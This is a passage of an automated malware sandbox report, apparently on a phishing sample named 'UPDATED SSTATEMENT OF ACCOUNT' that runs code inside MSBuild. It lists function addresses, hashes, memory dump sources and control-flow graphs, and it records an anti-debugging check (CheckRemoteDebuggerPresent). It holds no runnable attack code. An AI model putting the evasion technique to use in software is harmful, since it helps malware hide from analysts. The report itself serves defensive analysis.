                                              • Instruction Fuzzy Hash: 702183755093808FDB02CF64D594716BFB1EB46214F28C5DBD8498B267C33A980ACB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 014DD3D3 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2138242115.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14dd000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c1c52f64057ba31c7b3472a60d7ef901d747df3ca643598d73882777f3d56ec
                                              • Instruction ID: 10daf33f1ae2897d4088254945c3bcd26b2d76d4958ae81ac50c5095dabffaac
                                              • Opcode Fuzzy Hash: 7c1c52f64057ba31c7b3472a60d7ef901d747df3ca643598d73882777f3d56ec
                                              • Instruction Fuzzy Hash: BC11CD72804280DFDF12CF44D9C0B56BF61FB84224F2482AAD8090B266C33AE456CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 014DD4BF Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2138242115.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14dd000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c1c52f64057ba31c7b3472a60d7ef901d747df3ca643598d73882777f3d56ec
                                              • Instruction ID: 774744ea602dfb24424c4ac0d7734d68e4ffcff9687f7f1cc9744757788b2cba
                                              • Opcode Fuzzy Hash: 7c1c52f64057ba31c7b3472a60d7ef901d747df3ca643598d73882777f3d56ec
                                              • Instruction Fuzzy Hash: B111DF72804280CFCF12CF54D9D0B16BF71FB84314F24C6AAD8090B266C33AD456CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 014ED1CF Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2138341810.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14ed000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 57e3e11dd54d086b93e848213dee2e5cd9da70134201e791e4ff5700e7437990
                                              • Instruction ID: ea77272cd17985ab895f28f12d3dee208de626a68345f9917454d6c007eddbea
                                              • Opcode Fuzzy Hash: 57e3e11dd54d086b93e848213dee2e5cd9da70134201e791e4ff5700e7437990
                                              • Instruction Fuzzy Hash: 1911BB75904280DFDB02CF54C5C4B16BBA1FB84224F24C6AAD8494B3A6C33AD40ACB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 0178F8E0 Relevance: .4, Instructions: 379COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f88c503c5f12e6a95f85ecd62777f22d89ce2bb7ada8da4ceaffcd0ff745cd26
                                              • Instruction ID: ae317ed22c8c5830638ba1d74cb8b5fa820a5e5d3b142883a99c00a958ee516f
                                              • Opcode Fuzzy Hash: f88c503c5f12e6a95f85ecd62777f22d89ce2bb7ada8da4ceaffcd0ff745cd26
                                              • Instruction Fuzzy Hash: EBE1CD317416059FEB19EF79C464BAEBBF6AF89300F1484ADC245DB290DB35DA01CB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01787190 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3a850c2f286680aa03949fa1e57bb52146908537abf16cae4dd925b408278e0b
                                              • Instruction ID: d37bf56a37afa2cf6036093fb3d0a48ed3f6b76f4c34c9c254d40171744b5513
                                              • Opcode Fuzzy Hash: 3a850c2f286680aa03949fa1e57bb52146908537abf16cae4dd925b408278e0b
                                              • Instruction Fuzzy Hash: 47E13974E042598FDB14DFA9D580AAEFBB2FF89300F248169D415AB356D730AD81CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017864E8 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 792cd40c575e38e4cb7b8e158835b372870c4f6fe435cf8aff2b1b60036a57f0
                                              • Instruction ID: 01ec9de50bfd5d3fc91b33444ce6c8318dbf0035cce5597af86f625322c68995
                                              • Opcode Fuzzy Hash: 792cd40c575e38e4cb7b8e158835b372870c4f6fe435cf8aff2b1b60036a57f0
                                              • Instruction Fuzzy Hash: 83E11C74E002599FDB14DFA8D580AAEFBB2FF88304F248169E515AB356D730AD41CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01786920 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: de212d4f22466d9b2864cc253253d5b934f401f13c11618ee9840dd9fe58dd9e
                                              • Instruction ID: 2641b8b73a1c27f05816a3b742a17e9dddb7c7f6e5dd6a0b60520acf995a1484
                                              • Opcode Fuzzy Hash: de212d4f22466d9b2864cc253253d5b934f401f13c11618ee9840dd9fe58dd9e
                                              • Instruction Fuzzy Hash: 1CE13B74E002599FDB14DFA9C580AAEFBB2FF89304F248169E405AB356D730AD81CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01788838 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d5a6931b06b21065dc36d5d9057a90a120158f788339db9eb771827007394c0
                                              • Instruction ID: 573f5e02e69fc805e37fc4b839f356c211a7b5103362868609c62d5ec48e0eb8
                                              • Opcode Fuzzy Hash: 5d5a6931b06b21065dc36d5d9057a90a120158f788339db9eb771827007394c0
                                              • Instruction Fuzzy Hash: C9E11874E002598FDB14DFA9D580AAEFBB2FF88304F648169D415AB356D730AD81CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01786D58 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bd4de1be1f02af6813cfdea86b3d8d5b104579294f7842c8a73faf42ea5373f8
                                              • Instruction ID: 5c95df8441334829a6c9a8650cca1b760b76e40975d1be5d414568d00ed65c60
                                              • Opcode Fuzzy Hash: bd4de1be1f02af6813cfdea86b3d8d5b104579294f7842c8a73faf42ea5373f8
                                              • Instruction Fuzzy Hash: 85E11B74E042598FDB14DFA8D580AAEFBB2FF88304F248169E515AB356D730AD41CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0186DC74 Relevance: .3, Instructions: 264COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3b91918835d034ca9912f12e0063c8ea796319e693d4b829073a3011c12b4eb5
                                              • Instruction ID: adec6e4d82007abffecd8e7115230e7396254153e314392ed2f19d659cc6b1f6
                                              • Opcode Fuzzy Hash: 3b91918835d034ca9912f12e0063c8ea796319e693d4b829073a3011c12b4eb5
                                              • Instruction Fuzzy Hash: 9FA16E32A0020A8FCF19DFB9D89059EBBB6FF84300B15456AE905EB265DB71DA55CF80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017859E0 Relevance: .1, Instructions: 139COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8cb4f878a63ec80102eaf2cbadd96de219ab5408552ebea19585c64e35cd11ce
                                              • Instruction ID: 1424912796e27127a04685b8adeec369594d05ceaca8c8c1c262356ba3db3f49
                                              • Opcode Fuzzy Hash: 8cb4f878a63ec80102eaf2cbadd96de219ab5408552ebea19585c64e35cd11ce
                                              • Instruction Fuzzy Hash: F151B274E49209CFCB04DF9AD5849EEFBF6AF89310F1490A6E419B7211D7309A41CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0178D0F4 Relevance: .0, Instructions: 20COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 394fda043172e0974bea634d829ff52138c087e03fa6d7d76012db9853ffacab
                                              • Instruction ID: 2fbb093a6b2cc174fd3645cc5cbb0818c693ecb64c9f7fb0576a5adf0781249c
                                              • Opcode Fuzzy Hash: 394fda043172e0974bea634d829ff52138c087e03fa6d7d76012db9853ffacab
                                              • Instruction Fuzzy Hash: D8D05E20A8D2849BC7211BD8E00C4F8FBBADF4B025B0520E2D15EAB493C2614626868A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:10.2%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:100%
                                              Total number of Nodes:3
                                              Total number of Limit Nodes:0
                                              execution_graph 27736 12670b0 27737 12670f4 CheckRemoteDebuggerPresent 27736->27737 27738 1267136 27737->27738

                                              Executed Functions

                                              Function 06900040 Relevance: 2.8, Instructions: 2806COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5298d309c023a8025c1b92ceade6d0afdd18576bbecfbc897394c1e78088c203
                                              • Instruction ID: b677a489628bbfa21bdd6b4cd6514048dedddade6db52b72617e1bca5a408c1d
                                              • Opcode Fuzzy Hash: 5298d309c023a8025c1b92ceade6d0afdd18576bbecfbc897394c1e78088c203
                                              • Instruction Fuzzy Hash: 2863D631D10B5A8EDB51EF68C884A99F7B1FF99300F15D69AE44877121EB70AAC4CF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 069034F8 Relevance: 2.2, Instructions: 2228COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 724c68ebb0c37d8961649553e18e9e1db30efd7d20d711a1882e82441e196a0c
                                              • Instruction ID: 76d6acf0ce945831680488b545c817299b87e850d7dd37626df68c5ec74c5330
                                              • Opcode Fuzzy Hash: 724c68ebb0c37d8961649553e18e9e1db30efd7d20d711a1882e82441e196a0c
                                              • Instruction Fuzzy Hash: 8B330D31D1071ACEDB11EF68C8805ADF7B5FF99300F25C69AE458A7251EB70AAC5CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06900007 Relevance: 1.9, Instructions: 1949COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3bc2df8b424e318b51bbc6541e8ffc3d4bbfb6716ea1c73065ce3d80c3067e78
                                              • Instruction ID: 3056e38bcdd12a5f6ee5efdd6eab02165ac991d38e8e68fa1ff60963d367a1b2
                                              • Opcode Fuzzy Hash: 3bc2df8b424e318b51bbc6541e8ffc3d4bbfb6716ea1c73065ce3d80c3067e78
                                              • Instruction Fuzzy Hash: 8123E631D10B5A8EDB51EF68C8806A9F7B1FF99310F15D69AE44877121EB70AAC4CF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 012670B0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1386 12670b0-1267134 CheckRemoteDebuggerPresent 1388 1267136-126713c 1386->1388 1389 126713d-1267178 1386->1389 1388->1389
                                              APIs
                                              • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01267127
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2158641479.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1260000_MSBuild.jbxd
                                              Similarity
                                              • API ID: CheckDebuggerPresentRemote
                                              • String ID:
                                              • API String ID: 3662101638-0
                                              • Opcode ID: b0aaec27b79b5f814be686e6ade5acaabd76c91e939f314e139c1c5aefe5fe2c
                                              • Instruction ID: 83411119bb66199c7f4b942dd56ee7556953a283d4ca6f364ab674d21b4d4ee9
                                              • Opcode Fuzzy Hash: b0aaec27b79b5f814be686e6ade5acaabd76c91e939f314e139c1c5aefe5fe2c
                                              • Instruction Fuzzy Hash: 102137B1800259CFDB14CF9AD884BEEFBF4EF49324F14845AE559A3250D778A944CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06905AF8 Relevance: 1.0, Instructions: 1022COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f338b57b019d71d3f0b5d1307866bf23978ff7b6f0514bbf10714f4149a99e1
                                              • Instruction ID: 4e394b9554e2fc059d6685ebadb1c4f0250687e67faece63fde28628feefddd3
                                              • Opcode Fuzzy Hash: 6f338b57b019d71d3f0b5d1307866bf23978ff7b6f0514bbf10714f4149a99e1
                                              • Instruction Fuzzy Hash: 4B924734E00205CFEB64DB68C584A5DB7F6EB89314F6584AAD409EB7A1DB75EC81CF80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06909D60 Relevance: .8, Instructions: 822COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 08afcdf7fa5ffb3db9b2e7a8b33ac3b5796f8b7123943d8c699e289fd4b2281c
                                              • Instruction ID: 9657c2ce7a2255bccd7f6f5b7249c28dbcf9983066d467c38e6b590096062bfe
                                              • Opcode Fuzzy Hash: 08afcdf7fa5ffb3db9b2e7a8b33ac3b5796f8b7123943d8c699e289fd4b2281c
                                              • Instruction Fuzzy Hash: 8F62AF34B102098FEB54DB68D594AADB7F6FF88314F248429E416DB796DB35EC81CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06908940 Relevance: .6, Instructions: 591COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e7423222cf3a97f6a63065de52e8f89916839895e9dc106f720f60536e29e059
                                              • Instruction ID: dacd1e010e2ed3a7f5f700b15cf53dc6d9d79a27a85eb2566f08a829edf1e6b9
                                              • Opcode Fuzzy Hash: e7423222cf3a97f6a63065de52e8f89916839895e9dc106f720f60536e29e059
                                              • Instruction Fuzzy Hash: 8C12F071F002159FEF64DBA4C99066EB7BAEB84364F208429E955DB781DB34EC42CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0690E9A7 Relevance: .6, Instructions: 569COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 055a442f75ef090713b9b8004915a16c99ca3b316dd0223a183bc6e6939f1ab6
                                              • Instruction ID: 630828cb777b007da1a07a29f8581225a9d2ce5a13ad6a4895df3af76f713770
                                              • Opcode Fuzzy Hash: 055a442f75ef090713b9b8004915a16c99ca3b316dd0223a183bc6e6939f1ab6
                                              • Instruction Fuzzy Hash: FB226F70E1010A8FFFA4DB69D4907AEB7BAFB89310F308926E415D7785DA35DC818B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06906808 Relevance: .5, Instructions: 545COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3215 6906808-6906829 3216 690682b-690682e 3215->3216 3217 6906830-690684f 3216->3217 3218 6906854-6906857 3216->3218 3217->3218 3219 6906ff8-6906ffa 3218->3219 3220 690685d-690687c 3218->3220 3222 6907001-6907004 3219->3222 3223 6906ffc 3219->3223 3228 6906895-690689f 3220->3228 3229 690687e-6906881 3220->3229 3222->3216 3225 690700a-6907013 3222->3225 3223->3222 3232 69068a5-69068b4 3228->3232 3229->3228 3230 6906883-6906893 3229->3230 3230->3232 3341 69068b6 call 6907021 3232->3341 3342 69068b6 call 6907028 3232->3342 3234 69068bb-69068c0 3235 69068c2-69068c8 3234->3235 3236 69068cd-6906baa 3234->3236 3235->3225 3257 6906bb0-6906c5f 3236->3257 3258 6906fea-6906ff7 3236->3258 3267 6906c61-6906c86 3257->3267 3268 6906c88 3257->3268 3270 6906c91-6906ca4 3267->3270 3268->3270 3272 6906fd1-6906fdd 3270->3272 3273 6906caa-6906ccc 3270->3273 3272->3257 3274 6906fe3 3272->3274 3273->3272 3276 6906cd2-6906cdc 3273->3276 3274->3258 3276->3272 3277 6906ce2-6906ced 3276->3277 3277->3272 3278 6906cf3-6906dc9 3277->3278 3290 6906dd7-6906e07 3278->3290 3291 6906dcb-6906dcd 3278->3291 3295 6906e15-6906e21 3290->3295 3296 6906e09-6906e0b 3290->3296 3291->3290 3297 6906e81-6906e85 3295->3297 3298 6906e23-6906e27 3295->3298 3296->3295 3300 6906fc2-6906fcb 3297->3300 3301 6906e8b-6906ec7 3297->3301 3298->3297 3299 6906e29-6906e53 3298->3299 3308 6906e61-6906e7e 3299->3308 3309 6906e55-6906e57 3299->3309 3300->3272 3300->3278 3311 6906ed5-6906ee3 3301->3311 3312 6906ec9-6906ecb 3301->3312 3308->3297 3309->3308 3315 6906ee5-6906ef0 3311->3315 3316 6906efa-6906f05 3311->3316 3312->3311 3315->3316 3321 6906ef2 3315->3321 3319 6906f07-6906f0d 3316->3319 3320 6906f1d-6906f2e 3316->3320 3322 6906f11-6906f13 3319->3322 3323 6906f0f 3319->3323 3325 6906f30-6906f36 3320->3325 3326 6906f46-6906f52 3320->3326 3321->3316 3322->3320 3323->3320 3327 6906f38 3325->3327 3328 6906f3a-6906f3c 3325->3328 3330 6906f54-6906f5a 3326->3330 3331 6906f6a-6906fbb 3326->3331 3327->3326 3328->3326 3332 6906f5c 3330->3332 3333 6906f5e-6906f60 3330->3333 3331->3300 3332->3331 3333->3331 3341->3234 3342->3234
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eb51cf05e8f9f9f709f49b9e999cd6d94d3c2b21363af3a35fc567c5ea22468e
                                              • Instruction ID: e757995328b7ec55baa20ebe56d74ee922370b9a8a716d39c76db41526ae6bae
                                              • Opcode Fuzzy Hash: eb51cf05e8f9f9f709f49b9e999cd6d94d3c2b21363af3a35fc567c5ea22468e
                                              • Instruction Fuzzy Hash: CD323031E1065ACFDB14EFB5C85059DB7B6BFD9300F20C6AAD50AA7254EB70AD81CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0690B4F0 Relevance: .5, Instructions: 472COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3514 690b4f0-690b50e 3515 690b510-690b513 3514->3515 3516 690b520-690b523 3515->3516 3517 690b515-690b51f 3515->3517 3518 690b525-690b533 3516->3518 3519 690b53a-690b53d 3516->3519 3528 690b535 3518->3528 3529 690b596-690b5ac 3518->3529 3520 690b560-690b563 3519->3520 3521 690b53f-690b55b 3519->3521 3522 690b584-690b586 3520->3522 3523 690b565-690b57f 3520->3523 3521->3520 3526 690b588 3522->3526 3527 690b58d-690b590 3522->3527 3523->3522 3526->3527 3527->3515 3527->3529 3528->3519 3533 690b5b2-690b5bb 3529->3533 3534 690b7c7-690b7d1 3529->3534 3536 690b5c1-690b5de 3533->3536 3537 690b7d2-690b7e1 3533->3537 3544 690b7b4-690b7c1 3536->3544 3545 690b5e4-690b60c 3536->3545 3540 690b7e3-690b807 3537->3540 3541 690b774-690b796 3537->3541 3543 690b809-690b80c 3540->3543 3571 690b7a2-690b7ae 3541->3571 3547 690b812-690b821 3543->3547 3548 690ba38-690ba3b 3543->3548 3544->3533 3544->3534 3545->3544 3570 690b612-690b61b 3545->3570 3558 690b840-690b87b 3547->3558 3559 690b823-690b83e 3547->3559 3549 690ba41-690ba4d 3548->3549 3550 690baf2-690baf5 3548->3550 3560 690ba58-690ba5a 3549->3560 3551 690baf7-690bb13 3550->3551 3552 690bb18-690bb1a 3550->3552 3551->3552 3556 690bb21-690bb24 3552->3556 3557 690bb1c 3552->3557 3556->3543 3562 690bb2a-690bb33 3556->3562 3557->3556 3576 690b881-690b892 3558->3576 3577 690ba0c-690ba21 3558->3577 3559->3558 3565 690ba72-690ba79 3560->3565 3566 690ba5c-690ba62 3560->3566 3567 690ba8a 3565->3567 3568 690ba7b-690ba88 3565->3568 3573 690ba64 3566->3573 3574 690ba66-690ba68 3566->3574 3575 690ba8f-690ba91 3567->3575 3568->3575 3570->3537 3579 690b621-690b63d 3570->3579 3571->3544 3571->3570 3573->3565 3574->3565 3581 690ba93-690ba96 3575->3581 3582 690baa8-690bae1 3575->3582 3586 690b9f7-690ba06 3576->3586 3587 690b898-690b8b5 3576->3587 3577->3548 3579->3571 3589 690b643-690b66d 3579->3589 3581->3562 3582->3547 3600 690bae7-690baf1 3582->3600 3586->3576 3586->3577 3587->3586 3597 690b8bb-690b9b1 call 6909d10 3587->3597 3601 690b673-690b69b 3589->3601 3602 690b798-690b79d 3589->3602 3647 690b9b3-690b9bd 3597->3647 3648 690b9bf 3597->3648 3601->3602 3609 690b6a1-690b6cf 3601->3609 3602->3571 3609->3602 3614 690b6d5-690b6de 3609->3614 3614->3602 3616 690b6e4-690b716 3614->3616 3624 690b721-690b73d 3616->3624 3625 690b718-690b71c 3616->3625 3624->3571 3627 690b73f-690b76b call 6909d10 3624->3627 3625->3602 3626 690b71e 3625->3626 3626->3624 3627->3541 3649 690b9c4-690b9c6 3647->3649 3648->3649 3649->3586 3650 690b9c8-690b9cd 3649->3650 3651 690b9db 3650->3651 3652 690b9cf-690b9d9 3650->3652 3653 690b9e0-690b9e2 3651->3653 3652->3653 3653->3586 3654 690b9e4-690b9f0 3653->3654 3654->3586
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c0f6ffcc6cb3ba829950ea7f831c52c562c1736dbd50109ccb8d62fb28c49e41
                                              • Instruction ID: a29950808d20078686193c1c6cb7a5957478cc8c2b0d79e7baf8e3e8c0ca107a
                                              • Opcode Fuzzy Hash: c0f6ffcc6cb3ba829950ea7f831c52c562c1736dbd50109ccb8d62fb28c49e41
                                              • Instruction Fuzzy Hash: 6A029030B0021A8FEB54DB69D494B6EB7E6FF88314F248528D416DB798DB31EC42CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 012670A8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1380 12670a8-1267134 CheckRemoteDebuggerPresent 1382 1267136-126713c 1380->1382 1383 126713d-1267178 1380->1383 1382->1383
                                              APIs
                                              • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01267127
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2158641479.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1260000_MSBuild.jbxd
                                              Similarity
                                              • API ID: CheckDebuggerPresentRemote
                                              • String ID:
                                              • API String ID: 3662101638-0
                                              • Opcode ID: 2335695ec551a10a2f35f1081289c1f0938e4aafd8eee3d05877bdf5c2af3cd2
                                              • Instruction ID: 19b71485fd0bfb1969eaf8bee7dde9bc355d4f4966f7eb2a688c17c235462812
                                              • Opcode Fuzzy Hash: 2335695ec551a10a2f35f1081289c1f0938e4aafd8eee3d05877bdf5c2af3cd2
                                              • Instruction Fuzzy Hash: 1121487180025ACFDB14CF9AD884BEEFBF4AF48324F24846AE455A3650C738A944CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0690EDC8 Relevance: .5, Instructions: 473COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
